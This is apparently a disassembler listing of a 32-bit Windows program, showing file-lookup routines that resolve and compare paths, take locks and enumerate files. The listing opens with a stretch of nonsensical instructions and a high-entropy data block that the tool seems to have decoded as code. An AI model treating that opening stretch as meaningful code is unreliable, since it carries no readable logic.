jbe short near ptr loc_412F33+1
nop
cmpsd
mov ebx, 3AA1AEBAh
cmc
or [edx], dh
popa
push ebx
inc esi
db 2Eh
setalc
pusha
in eax, dx
cli
outsd
xor [ecx], ah
or bh, [ebx]
mov al, ds:83908E19h
sbb [esi], eax
nop
bound edi, [eax]
sbb [edx-788483F6h], ah
out 0DAh, al
int 6Fh
rcl esp, 6Ah
; ---------------------------------------------------------------------------
dd 72727F8Ch, 0CEC18456h, 21F5CCB3h, 0DA01F40Fh, 0FACDAFBCh
dd 57144D44h, 0DAAF56DEh, 54F1B954h, 0C521AD9Eh, 6689ABB8h
dd 0CA958847h, 0D6B4BC8Ch, 0F511F50Bh, 0DA1B4E8h, 7A5DD8Bh
dd 0AED40791h, 24494D3Ah, 5B8A0B18h, 0CAA0A117h, 0B196A3B1h
dd 55631006h, 0DED1C448h, 990A13EBh, 0B9C7AC9Ah, 7BADE3ACh
dd 5021110Eh, 5F563744h, 0E9F6026Fh, 0C120432Ch, 818FE4DAh
dd 36301374h, 6D263341h, 0E5F38876h, 0C44507D8h, 7CFDEDD2h
dd 7D426370h, 61D59D48h, 0E1EF8C62h, 6E1403D4h, 85C0662Bh
dd 5242A093h, 0EEE15EE1h, 22157593h, 0BDC1D42Fh, 90908F9Ch
dd 0C085C033h
db 75h, 0EEh
; ---------------------------------------------------------------------------
loc_41301E: ; CODE XREF: _3:00412EE0�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_41302C
jmp short loc_413045
; =============== S U B R O U T I N E =======================================
sub_41302C proc near ; CODE XREF: _3:00413025�p
; DATA XREF: _4:004212B0�o
mov ecx, [ebp-1Ch]
mov [ebp-188h], ecx
mov edx, [ebp-188h]
push edx
call sub_41BACD
add esp, 4
retn
sub_41302C endp
; ---------------------------------------------------------------------------
loc_413045: ; CODE XREF: _3:0041302A�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413056 proc near ; CODE XREF: sub_41E4C5+1F�p
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00413173 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4212B8
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
or [ebp+var_1C], 0FFFFFFFFh
push 0
lea eax, [ebp+var_1C]
push eax
push 3
push 80000000h
push [ebp+arg_0]
call sub_414344
test eax, eax
jz loc_413173
cmp [ebp+var_1C], 0FFFFFFFFh
jz loc_413173
mov eax, ds:dword_424864
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4130C7
mov eax, [ebp+var_2C]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_30], 1
jmp short loc_4130CB
; ---------------------------------------------------------------------------
loc_4130C7: ; CODE XREF: sub_413056+5C�j
and [ebp+var_30], 0
loc_4130CB: ; CODE XREF: sub_413056+6F�j
movzx eax, [ebp+var_30]
test eax, eax
jz loc_413173
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_1C]
mov ecx, ds:dword_424864
call sub_41EB4C
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_413140
push [ebp+var_1C]
call sub_418F16
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
cmp [ebp+var_20], 0
jnz short loc_41311F
push ds:off_4214F0
push 1Fh
push ds:off_4214F4
call sub_41BB7C
loc_41311F: ; CODE XREF: sub_413056+B4�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov [ebp+var_24], eax
push 0FFFFFFFFh
mov [ebp+var_38], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp short loc_413175
; ---------------------------------------------------------------------------
loc_413140: ; CODE XREF: sub_413056+A0�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41314B
jmp short loc_413173
sub_413056 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41314B proc near ; CODE XREF: sub_413056+EE�p
; DATA XREF: _4:004212C0�o
mov eax, ds:dword_424864
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short loc_413166
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
loc_413166: ; CODE XREF: sub_41314B+C�j
lea eax, [ebp-28h]
push eax
push dword ptr [ebp-1Ch]
call sub_41473F
retn
sub_41314B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_413056
loc_413173: ; CODE XREF: sub_413056+40�j
; sub_413056+4A�j ...
xor eax, eax
loc_413175: ; CODE XREF: sub_413056+E8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_413056
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413186 proc near ; CODE XREF: sub_413272+1B5�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
cmp [ebp+arg_4], 0
jz short loc_4131A7
mov ecx, [ebp+arg_4]
mov edi, [ebp+arg_8]
mov esi, [ebp+arg_0]
xor eax, eax
repe cmpsb
jnz loc_41326A
loc_4131A7: ; CODE XREF: sub_413186+C�j
push 5Ch
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
push eax
call sub_4105C0
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_413236
mov eax, [ebp+arg_C]
mov byte ptr [eax], 1
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
inc eax
cmp eax, 80h
jbe short loc_4131E6
xor eax, eax
jmp loc_41326C
; ---------------------------------------------------------------------------
loc_4131E6: ; CODE XREF: sub_413186+57�j
mov ecx, [ebp+var_C]
mov esi, [ebp+arg_8]
add esi, [ebp+arg_4]
mov edi, offset byte_4247C4
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_C]
and ds:byte_4247C4[eax], 0
mov eax, [ebp+arg_10]
mov dword ptr [eax], offset byte_4247C4
push offset byte_4247C4
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_41006B
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
jmp short loc_41326C
; ---------------------------------------------------------------------------
loc_413236: ; CODE XREF: sub_413186+38�j
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_41006B
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
mov ecx, [ebp+arg_10]
mov [ecx], eax
mov eax, [ebp+var_10]
jmp short loc_41326C
; ---------------------------------------------------------------------------
loc_41326A: ; CODE XREF: sub_413186+1B�j
xor eax, eax
loc_41326C: ; CODE XREF: sub_413186+5B�j
; sub_413186+AE�j ...
pop edi
pop esi
leave
retn 14h
sub_413186 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413272 proc near ; CODE XREF: sub_41365E+56�p
; sub_4136FE+90�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041364B SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4212C8
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 44h
push ebx
push esi
push edi
push offset dword_424848
call ds:dword_424644 ; RtlEnterCriticalSection
and [ebp+var_4], 0
cmp ds:dword_424888, 0
jnz short loc_4132C8
push 0FFFFFFFFh
and [ebp+var_4C], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_4C]
jmp loc_41364D
; ---------------------------------------------------------------------------
loc_4132C8: ; CODE XREF: sub_413272+3B�j
and [ebp+var_24], 0
lea eax, [ebp+var_24]
push eax
mov eax, ds:dword_424888
add eax, 114h
push eax
push 104h
push [ebp+arg_0]
call ds:dword_424688 ; GetFullPathNameA
mov [ebp+var_28], eax
push [ebp+var_28]
mov eax, ds:dword_424888
add eax, 114h
push eax
call ds:dword_424748 ; CharUpperBuffA
mov ecx, [ebp+var_28]
call sub_41546E
mov eax, ds:dword_424888
mov eax, [eax+0Ch]
mov [ebp+var_20], eax
and [ebp+var_1C], 0
and [ebp+var_2C], 0
and [ebp+var_30], 0
mov eax, ds:dword_424888
mov ecx, [eax+21Ch]
mov edi, ds:dword_424888
add edi, 10h
mov esi, ds:dword_424888
add esi, 114h
xor eax, eax
repe cmpsb
jnz loc_413634
mov eax, ds:dword_424888
mov eax, [eax+21Ch]
mov ecx, ds:dword_424888
lea eax, [ecx+eax+114h]
mov [ebp+var_3C], eax
and [ebp+var_38], 0
push 5Ch
push [ebp+var_3C]
call sub_4105C0
pop ecx
pop ecx
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jz short loc_413389
mov eax, [ebp+var_34]
sub eax, [ebp+var_3C]
inc eax
mov [ebp+var_38], eax
jmp short loc_4133B5
; ---------------------------------------------------------------------------
loc_413389: ; CODE XREF: sub_413272+109�j
mov eax, ds:dword_424604
mov eax, [eax+24h]
and eax, 20h
test eax, eax
jnz short loc_4133B1
push 0FFFFFFFFh
and [ebp+var_50], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_50]
jmp loc_41364D
; ---------------------------------------------------------------------------
loc_4133B1: ; CODE XREF: sub_413272+124�j
and [ebp+var_38], 0
loc_4133B5: ; CODE XREF: sub_413272+115�j
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
test ecx, ecx
jnz short loc_4133D1
cmp [ebp+arg_8], 0
jnz short loc_4133D1
jmp loc_41360B
; ---------------------------------------------------------------------------
loc_4133D1: ; CODE XREF: sub_413272+152�j
; sub_413272+158�j
cmp [ebp+arg_8], 0
jz short loc_4133F4
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jz short loc_4133F4
mov eax, [ebp+arg_8]
mov ecx, ds:dword_424888
mov eax, [eax]
sub eax, [ecx+8]
sar eax, 4
inc eax
mov [ebp+var_1C], eax
loc_4133F4: ; CODE XREF: sub_413272+163�j
; sub_413272+16B�j
jmp short loc_4133FD
; ---------------------------------------------------------------------------
loc_4133F6: ; CODE XREF: sub_413272:loc_413432�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4133FD: ; CODE XREF: sub_413272:loc_4133F4�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnb short loc_413434
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
mov eax, [ecx+eax]
push dword ptr [eax]
push [ebp+var_38]
push [ebp+var_3C]
call sub_413186
test eax, eax
jz short loc_413432
jmp short loc_413434
; ---------------------------------------------------------------------------
loc_413432: ; CODE XREF: sub_413272+1BC�j
jmp short loc_4133F6
; ---------------------------------------------------------------------------
loc_413434: ; CODE XREF: sub_413272+191�j
; sub_413272+1BE�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnb loc_41360B
mov edi, [ebp+var_2C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_48], ecx
movzx eax, [ebp+var_30]
test eax, eax
jz short loc_4134CC
jmp short loc_413461
; ---------------------------------------------------------------------------
loc_41345A: ; CODE XREF: sub_413272:loc_4134CA�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_413461: ; CODE XREF: sub_413272+1E6�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_1C], eax
jnb short loc_4134CC
mov eax, [ebp+var_1C]
inc eax
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
mov eax, [ecx+eax]
mov edi, [eax]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_48]
add eax, [ebp+var_38]
cmp ecx, eax
jb short loc_4134C8
mov ecx, [ebp+var_48]
add ecx, [ebp+var_38]
mov eax, [ebp+var_1C]
shl eax, 4
mov edx, ds:dword_424888
mov edx, [edx+8]
mov eax, [edx+eax]
mov edi, [eax]
mov eax, [ebp+var_1C]
inc eax
shl eax, 4
mov edx, ds:dword_424888
mov edx, [edx+8]
mov eax, [edx+eax]
mov esi, [eax]
xor eax, eax
repe cmpsb
jz short loc_4134CA
loc_4134C8: ; CODE XREF: sub_413272+21F�j
jmp short loc_4134CC
; ---------------------------------------------------------------------------
loc_4134CA: ; CODE XREF: sub_413272+254�j
jmp short loc_41345A
; ---------------------------------------------------------------------------
loc_4134CC: ; CODE XREF: sub_413272+1E4�j
; sub_413272+1F6�j ...
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
mov eax, [ecx+eax+4]
add eax, [ebp+var_38]
mov [ebp+var_2C], eax
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
add ecx, eax
mov [ebp+var_40], ecx
mov eax, [ebp+var_40]
mov eax, [eax]
mov [ebp+var_44], eax
xor eax, eax
mov edi, [ebp+arg_4]
stosd
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+arg_4]
add edi, 2Ch
rep stosd
cmp [ebp+var_48], 104h
jnb short loc_413525
mov eax, [ebp+var_48]
mov [ebp+var_54], eax
jmp short loc_41352C
; ---------------------------------------------------------------------------
loc_413525: ; CODE XREF: sub_413272+2A9�j
mov [ebp+var_54], 104h
loc_41352C: ; CODE XREF: sub_413272+2B1�j
mov ecx, [ebp+var_54]
mov esi, [ebp+var_2C]
mov edi, [ebp+arg_4]
add edi, 2Ch
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, [ebp+arg_4]
add edi, 130h
stosd
stosd
stosd
stosw
cmp [ebp+var_48], 0Eh
jbe short loc_413565
mov [ebp+var_58], 0Eh
jmp short loc_41356B
; ---------------------------------------------------------------------------
loc_413565: ; CODE XREF: sub_413272+2E8�j
mov eax, [ebp+var_48]
mov [ebp+var_58], eax
loc_41356B: ; CODE XREF: sub_413272+2F1�j
mov ecx, [ebp+var_58]
mov esi, [ebp+var_2C]
mov edi, [ebp+arg_4]
add edi, 130h
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
movzx eax, [ebp+var_30]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_44]
mov ecx, [ecx+8]
mov [eax+20h], ecx
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+4], edx
mov eax, [eax+20h]
mov [ecx+8], eax
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+0Ch], edx
mov eax, [eax+20h]
mov [ecx+10h], eax
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+14h], edx
mov eax, [eax+20h]
mov [ecx+18h], eax
cmp [ebp+arg_8], 0
jz short loc_4135F2
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_40]
mov [eax], ecx
loc_4135F2: ; CODE XREF: sub_413272+376�j
push 0FFFFFFFFh
mov [ebp+var_5C], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_5C]
jmp short loc_41364D
; ---------------------------------------------------------------------------
loc_41360B: ; CODE XREF: sub_413272+15A�j
; sub_413272+1C8�j
cmp [ebp+arg_8], 0
jz short loc_41362C
mov eax, ds:dword_424888
mov eax, [eax+0Ch]
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
add ecx, eax
mov eax, [ebp+arg_8]
mov [eax], ecx
loc_41362C: ; CODE XREF: sub_413272+39D�j
push 12h
call ds:dword_42470C ; RtlRestoreLastWin32Error
loc_413634: ; CODE XREF: sub_413272+D1�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41363F
jmp short loc_41364B
sub_413272 endp
; =============== S U B R O U T I N E =======================================
sub_41363F proc near ; CODE XREF: sub_413272+3C6�p
; DATA XREF: _4:004212D0�o
push offset dword_424848
call ds:dword_4246D4 ; RtlLeaveCriticalSection
retn
sub_41363F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_413272
loc_41364B: ; CODE XREF: sub_413272+3CB�j
xor eax, eax
loc_41364D: ; CODE XREF: sub_413272+51�j
; sub_413272+13A�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_413272
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41365E proc near ; CODE XREF: sub_41D96A+E�p
; sub_41D997+7D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+arg_8]
or dword ptr [eax], 0FFFFFFFFh
push 0Ch
call sub_41BA4A
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41369B
mov eax, [ebp+var_8]
and dword ptr [eax], 0
mov eax, [ebp+var_8]
and dword ptr [eax+4], 0
mov eax, [ebp+var_8]
and dword ptr [eax+8], 0
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
jmp short loc_41369F
; ---------------------------------------------------------------------------
loc_41369B: ; CODE XREF: sub_41365E+1F�j
and [ebp+var_C], 0
loc_41369F: ; CODE XREF: sub_41365E+3B�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and dword ptr [eax], 0
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_413272
test eax, eax
jz short loc_4136F8
push 0
push [ebp+arg_0]
call sub_41C9BA
pop ecx
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+4], eax
mov eax, [ebp+var_4]
and dword ptr [eax+8], 0
push [ebp+var_4]
push [ebp+var_4]
mov ecx, ds:dword_42486C
call sub_410000
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov [eax], ecx
and [ebp+var_4], 0
push 1
pop eax
jmp short locret_4136FA
; ---------------------------------------------------------------------------
loc_4136F8: ; CODE XREF: sub_41365E+5D�j
xor eax, eax
locret_4136FA: ; CODE XREF: sub_41365E+98�j
leave
retn 0Ch
sub_41365E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4136FE proc near ; CODE XREF: sub_41DC5C+12�p
; sub_41DC8D+19�p
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00413825 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4212E8
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_42486C
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_413744
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_413748
; ---------------------------------------------------------------------------
loc_413744: ; CODE XREF: sub_4136FE+31�j
and [ebp+var_24], 0
loc_413748: ; CODE XREF: sub_4136FE+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz loc_413825
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_42486C
call sub_41EB4C
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_4137FE
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jnz short loc_413798
push [ebp+var_1C]
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call sub_413272
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_413798: ; CODE XREF: sub_4136FE+82�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jnz short loc_4137E5
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jnz short loc_4137D1
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call ds:dword_424650 ; FindFirstFileA
mov ecx, [ebp+var_1C]
mov [ecx+8], eax
mov eax, [ebp+var_1C]
xor ecx, ecx
cmp dword ptr [eax+8], 0FFFFFFFFh
setnz cl
mov eax, [ebp+arg_8]
mov [eax], ecx
jmp short loc_4137E5
; ---------------------------------------------------------------------------
loc_4137D1: ; CODE XREF: sub_4136FE+A9�j
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
call ds:dword_424654 ; FindNextFileA
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_4137E5: ; CODE XREF: sub_4136FE+A0�j
; sub_4136FE+D1�j
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_413827
; ---------------------------------------------------------------------------
loc_4137FE: ; CODE XREF: sub_4136FE+6F�j
or [ebp+var_4], 0FFFFFFFFh
call sub_413809
jmp short loc_413825
sub_4136FE endp
; =============== S U B R O U T I N E =======================================
sub_413809 proc near ; CODE XREF: sub_4136FE+104�p
; DATA XREF: _4:004212F0�o
mov eax, ds:dword_42486C
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_413824
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_413824: ; CODE XREF: sub_413809+C�j
retn
sub_413809 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4136FE
loc_413825: ; CODE XREF: sub_4136FE+50�j
; sub_4136FE+109�j
xor eax, eax
loc_413827: ; CODE XREF: sub_4136FE+FE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4136FE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413838 proc near ; CODE XREF: sub_41473F+CE�p
; sub_41DC35+B�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00413959 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4212F8
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
mov eax, ds:dword_42486C
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_41387E
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_413882
; ---------------------------------------------------------------------------
loc_41387E: ; CODE XREF: sub_413838+31�j
and [ebp+var_2C], 0
loc_413882: ; CODE XREF: sub_413838+44�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_413959
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_42486C
call sub_41EB4C
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_413932
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jz short loc_4138C2
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
call ds:dword_424624 ; CloseHandle
loc_4138C2: ; CODE XREF: sub_413838+7C�j
push [ebp+arg_0]
mov ecx, ds:dword_42486C
call sub_41EBBB
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_41390C
mov eax, [ebp+var_20]
mov eax, [eax+4]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_41BACD
pop ecx
push 1
pop eax
and eax, 1
test eax, eax
jz short loc_413904
push [ebp+var_20]
call sub_41BACD
pop ecx
loc_413904: ; CODE XREF: sub_413838+C1�j
mov eax, [ebp+var_20]
mov [ebp+var_38], eax
jmp short loc_413910
; ---------------------------------------------------------------------------
loc_41390C: ; CODE XREF: sub_413838+A5�j
and [ebp+var_38], 0
loc_413910: ; CODE XREF: sub_413838+D2�j
mov eax, [ebp+arg_4]
mov dword ptr [eax], 1
push 0FFFFFFFFh
mov [ebp+var_3C], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_41395B
; ---------------------------------------------------------------------------
loc_413932: ; CODE XREF: sub_413838+6F�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41393D
jmp short loc_413959
sub_413838 endp
; =============== S U B R O U T I N E =======================================
sub_41393D proc near ; CODE XREF: sub_413838+FE�p
; DATA XREF: _4:00421300�o
mov eax, ds:dword_42486C
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short locret_413958
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_413958: ; CODE XREF: sub_41393D+C�j
retn
sub_41393D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_413838
loc_413959: ; CODE XREF: sub_413838+50�j
; sub_413838+103�j
xor eax, eax
loc_41395B: ; CODE XREF: sub_413838+F8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_413838
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41396C proc near ; CODE XREF: sub_41E519+20�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = dword ptr -6Ch
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00413ACF SIZE 000001F8 BYTES
; FUNCTION CHUNK AT 00413D31 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421308
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 80h
push ebx
push esi
push edi
or [ebp+var_20], 0FFFFFFFFh
or [ebp+var_28], 0FFFFFFFFh
and [ebp+var_2C], 0
and [ebp+var_1C], 0
and [ebp+var_24], 0
push 0
lea eax, [ebp+var_20]
push eax
push 3
push 80000000h
push [ebp+arg_0]
call sub_414344
test eax, eax
jz loc_413D31
cmp [ebp+var_20], 0FFFFFFFFh
jz loc_413D31
mov eax, ds:dword_424864
